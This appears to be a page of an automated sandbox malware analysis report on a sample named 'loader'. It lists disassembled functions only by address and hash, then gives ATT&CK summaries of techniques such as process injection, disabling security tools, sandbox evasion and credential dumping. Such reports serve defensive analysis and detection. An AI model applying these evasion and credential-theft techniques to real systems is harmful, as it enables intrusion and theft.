Opcode ID: 2c24e20bea610e88851944b43960f697f78c5629713778a5ae26d8ffee1f97c7
Instruction ID: b164788230663939d94884fa7789a97e516397df8b14da889caa464566af0290
Opcode Fuzzy Hash: 2c24e20bea610e88851944b43960f697f78c5629713778a5ae26d8ffee1f97c7
Instruction Fuzzy Hash: C611ED315492848BE3158F34D4713ABBBE0AF97320F1869ACC0C1CB292DA3888018749

Function 00407610 Relevance: .6, Instructions: 625COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
Instruction ID: ebab008d0e48970fed17e6a3617bb7b732738baacd80c9cc26f44d66593ece1f
Opcode Fuzzy Hash: eda36f71eba9765271182112f1f3655c34cc5f944bc2088baf291ead026e868a
Instruction Fuzzy Hash: 7A22B332A0C7118BC725DF18D9806ABB3E1BFC4319F19893ED986A7385D738B8518B47

Function 00405AB0 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153e5bbaf5f0c8219b238545d6b5a9a29cd85768878ef1bace23f5d4d6a6f8df
Instruction ID: d63ec0d51e216a0d3e371cb4428fc596994073969c13bb10247aec771fa6ec75
Opcode Fuzzy Hash: 153e5bbaf5f0c8219b238545d6b5a9a29cd85768878ef1bace23f5d4d6a6f8df
Instruction Fuzzy Hash: 6EF1CD356087418FC724CF29C98066BFBE2EFD9304F08882EE5D597791E639E845CB96

Function 004156F7 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c070b58a04326a2cc431b4aa1e7437f7f8e2130a21f62317e0e9604c7719c56e
Instruction ID: 76744089ee41daf15d605aa6bf47e12c99e0aaf2e6e6e0deb77baf970f2b041a
Opcode Fuzzy Hash: c070b58a04326a2cc431b4aa1e7437f7f8e2130a21f62317e0e9604c7719c56e
Instruction Fuzzy Hash: 2DE121B4C00B00ABD320AF39D947793BFB4EB45310F50461EE8EA9B795E374A4598BD6

Function 0041C34B Relevance: .3, Instructions: 308COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6e4e83bfd7ae577b4c22dfe2a618c5e3dbe50020ad8dcb6368028eda53706b8
Instruction ID: 0fd7fee7e0050714edf847d5c29a14deb28163bd113c87fe588f29f90a5ca42c
Opcode Fuzzy Hash: c6e4e83bfd7ae577b4c22dfe2a618c5e3dbe50020ad8dcb6368028eda53706b8
Instruction Fuzzy Hash: 26912AB15446118BD3248F29C891373F7F2FF96314F28925ED4968B791E338E842C789

Function 0041DC80 Relevance: .3, Instructions: 298COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9707a75b2658dfc4ef3bfae41a5ef2a7858c8621cca632a17aae4d3cc8ca4fe
Instruction ID: 9b45f6b905fb5e315c937a095bc6661f051998f931ea22e38c1b35f991def234
Opcode Fuzzy Hash: e9707a75b2658dfc4ef3bfae41a5ef2a7858c8621cca632a17aae4d3cc8ca4fe
Instruction Fuzzy Hash: 24A16D72A086614FC711CE28C8503ABBBE1AB85314F19867DE8E99B382D338DD47D7C5

Function 00444140 Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9bbe478612c030c1e8ca468340f5e214d633e965f8de8c51e4941042d674017
Instruction ID: 0a329d03f65c8844b9d69f2db4f9566f244e2f51000db83721d42b8bc2ba9b11
Opcode Fuzzy Hash: d9bbe478612c030c1e8ca468340f5e214d633e965f8de8c51e4941042d674017
Instruction Fuzzy Hash: 7D81DF386083058BD714DF28C880A2BB3F1EF99764F14862DF9958B3A1EB39EC55C749

Function 00443E80 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a3754c80de5fa5a319d3281c70bae07c5d7f49d72b25b60785bb77fb61e89c
Instruction ID: e60b0233afcbd53d5126b115a2fc8257fa883e3d3a3e137b9e43c760f8c4690f
Opcode Fuzzy Hash: f0a3754c80de5fa5a319d3281c70bae07c5d7f49d72b25b60785bb77fb61e89c
Instruction Fuzzy Hash: 8081BF346052018FE718DF18D890A2BB7F2BF99715F14852EE9918B3A1DB35EC51CB4A

Function 00419102 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9021d6c2ec371d45181bc7b5f246eb5f9fdbaa2e451e3ad9ed53017fbf8c2720
Instruction ID: c325470136de6f3017f5e4d401d678d56e28664f80205e1b2222aab56ca5f2de
Opcode Fuzzy Hash: 9021d6c2ec371d45181bc7b5f246eb5f9fdbaa2e451e3ad9ed53017fbf8c2720
Instruction Fuzzy Hash: 5D615BB4500B018BD325CF29C4917A3B7F1FF8A314F189A5DC49A8BB91D379E846CB98

Function 0042EB92 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779bb3fd48365f3aeec8e89c3581eff1e9fbc18ae763d5edf33707ce07a96fde
Instruction ID: 362e09ae9c068ae67ca4a174e03c958e8b81ad292489d85ba3723d0923afea01
Opcode Fuzzy Hash: 779bb3fd48365f3aeec8e89c3581eff1e9fbc18ae763d5edf33707ce07a96fde
Instruction Fuzzy Hash: 6551363560C3E18AE7398B2580617E7BFE29FD7300F59489EC4C98B782DB394406C796

Function 004414B4 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5ebf2fe79bc7f77b4bb9a8784702cfe07a8d2d4548ef50fde366c650cb5f7ba
Instruction ID: a6166798885adcd1dd8503b04526a467719eefe52b5d4b1b366c30a560a325d8
Opcode Fuzzy Hash: e5ebf2fe79bc7f77b4bb9a8784702cfe07a8d2d4548ef50fde366c650cb5f7ba
Instruction Fuzzy Hash: D55127B6A106008FD708CFA4DC9177A7BF1EB42315F0AC27DC8069B3A2DB359944CB94

Function 0043DD20 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c87db826abcb013e505565030d666cf4074fe4204eb551183148f7e9a8207237
Instruction ID: ab5b5c255551614ef1adb6450f5e702f0f9aeb33c59e4700f4e93588a14da0e6
Opcode Fuzzy Hash: c87db826abcb013e505565030d666cf4074fe4204eb551183148f7e9a8207237
Instruction Fuzzy Hash: C53129B5D043005BE7109F61EC82B3B7BA8EF59708F10582EF9855B251E735DC158B9A

Function 0041B4B9 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 854574aef7d2af25c5f687afbca36c6cf5b10932b2aa6bd1cba6780ee6e07ea8
Instruction ID: 0694307dda778dfca69c6520e19ed415fdaea2f7394c247712d33dee283bf954
Opcode Fuzzy Hash: 854574aef7d2af25c5f687afbca36c6cf5b10932b2aa6bd1cba6780ee6e07ea8
Instruction Fuzzy Hash: D331F3726047418FD726CF29C8807A2FBE2FB5A308F1C85AED1D6CB352D678D8468744

Function 00409000 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbeeaa0597f8f8dc84a118a644948b79d4397fd8268663145335eceb06139f64
Instruction ID: d1b990eb4aa8a017dc8a18784f5f788816fa061ceeb4f2da6f91da8744dd6541
Opcode Fuzzy Hash: fbeeaa0597f8f8dc84a118a644948b79d4397fd8268663145335eceb06139f64
Instruction Fuzzy Hash: D5215CB17093446BE7281A15EC91B7FBBE99BC1304F18483DEB85A72C2D17A8D05D36A

Function 00440110 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097a7572ea0c76754719ab685070bf4ad376f5838f1144e3a7db826ec64c11bc
Instruction ID: 77a0acc297c083cf6c25ea0dee22e4d5c2fa47fcb5ad6e0902c895d634b60da8
Opcode Fuzzy Hash: 097a7572ea0c76754719ab685070bf4ad376f5838f1144e3a7db826ec64c11bc
Instruction Fuzzy Hash: FF2103B09082009BF714CF25C84473BB7E1EFD5320F14862EE8D46B392C33A9C568B96

Function 00439060 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: aea489975e0df46f8bc821318618d5d2e89089d55edc36bc76260726d433a5e3
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: F711E933A091D50EC31A8D3C85005A9BFF30AD7234F5D939AF4B49B2D6D6278D8AC359

Function 0042C400 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b92fa6a471fc16c29fa856a13561914a6a8c118ac626aa6a6e4ef7cce2d971b
Instruction ID: 4e4c791343b49dc805b0388fe01105e4507aea2e58f72301bdd1a92f6e6f1b4f
Opcode Fuzzy Hash: 7b92fa6a471fc16c29fa856a13561914a6a8c118ac626aa6a6e4ef7cce2d971b
Instruction Fuzzy Hash: 140192B1B0071187EA20AF15E8D073BA2A86F84718F98453ED4445B342DB7DEC0586D9

Function 00430850 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff532a53a1410fd427edc0df085910ea2f761bbe91931d20fa03c768f64f70aa
Instruction ID: c2ffb5f359094c245b4c7acb21e259725fb47b4813ee39ba0d83d68c491bbd0c
Opcode Fuzzy Hash: ff532a53a1410fd427edc0df085910ea2f761bbe91931d20fa03c768f64f70aa
Instruction Fuzzy Hash: 551129257093418BE319DF35C43133ABBD1AFAA300F19A96DC0C2CB341DB78C9058349

Function 004307F7 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae42c9155b5d303414fc0542165f974528e09da759253f349ad853c52767a4a7
Instruction ID: e06d02b47052cd47c3d7e849edb3c1948cf25361a1c3834714037db2c4b4bc37
Opcode Fuzzy Hash: ae42c9155b5d303414fc0542165f974528e09da759253f349ad853c52767a4a7
Instruction Fuzzy Hash: 0811E1715593858BE3198F25C43176BFBE0AF93310F19A95CD0D2CB352D779C8058B4A

Function 0041BC81 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17c2e4681fd8838d4d64934bd61a79aaeea433d5333c7748c7e2d9ced909d72f
Instruction ID: fab6f13529d5a10f848e5761cf56b2be92e9b0ba1438d59b8495c079bafb183c
Opcode Fuzzy Hash: 17c2e4681fd8838d4d64934bd61a79aaeea433d5333c7748c7e2d9ced909d72f
Instruction Fuzzy Hash: B901D6345042828AEB124F6A84506B7FBE0AF53310F1896D6C4959B2C2C2798489C765

Function 00440490 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f12b58609eaa4edc1a1367c565e3f14351d030f7fb1da24746f74bb21b18950
Instruction ID: f66456134204f9b1663d0f42aa32423a7de3ca6d5f9d24c6332f9fa75eb7f561
Opcode Fuzzy Hash: 2f12b58609eaa4edc1a1367c565e3f14351d030f7fb1da24746f74bb21b18950
Instruction Fuzzy Hash: 81F0F935904204ABE1109F059C40D37736DEB8E77CF10032AF719132A1E336FD2197A9

Function 004311E3 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3124c0f37b97b2272e910ddefbc69ac7774de155a5b5254ef9ddd136d4832296
Instruction ID: dac2bd52b1ef467cf223400008e44673e60d3de5672e83dffdcebfc90c58b805
Opcode Fuzzy Hash: 3124c0f37b97b2272e910ddefbc69ac7774de155a5b5254ef9ddd136d4832296
Instruction Fuzzy Hash: 58F0277FD0082147DB19CB18EC521B873A18B8A308B09A23CC446BB615FE6CA80AC0C5

Function 0040ABA5 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 743a67061527bd5e3a888e72885ec5678cc5b09e9ba47a3386c66d4cf376eb86
Instruction ID: 7eea59d853bf05618220f25976eaded6e29ea34bb044c63bfd18c0463a3f3a02
Opcode Fuzzy Hash: 743a67061527bd5e3a888e72885ec5678cc5b09e9ba47a3386c66d4cf376eb86
Instruction Fuzzy Hash: AAF0E53AD640214FD701CF28DC903ABB7B1974B308F195268D919E7381DA74AA0187C8

Function 0041FDE0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: e3580ff29d45f1f19fcfbba416c02c55fa8e952143845e5f19c55485f34862ec
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 9AD0A7716487A10E57588D3814A08B7FBE8E947612B1814EFE8D6E7216D229DC47469C

Function 00437291 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004372C5
GetSystemMetrics.USER32 ref: 004372D4

Strings

, xrefs: 00437382

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 64bca6fc7348439f6ec99349d83ebd95cf56766e58815ef0b78a23439e5fb008
Instruction ID: 92b41f4802adc6c6e967c3d6e1cad8a4c8ae76d6d49a1f576b0552df4b956962
Opcode Fuzzy Hash: 64bca6fc7348439f6ec99349d83ebd95cf56766e58815ef0b78a23439e5fb008
Instruction Fuzzy Hash: 2C3191B49193148FDB00EF78D98560EBBF4BB89304F01856EE898DB364D374A949CF96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

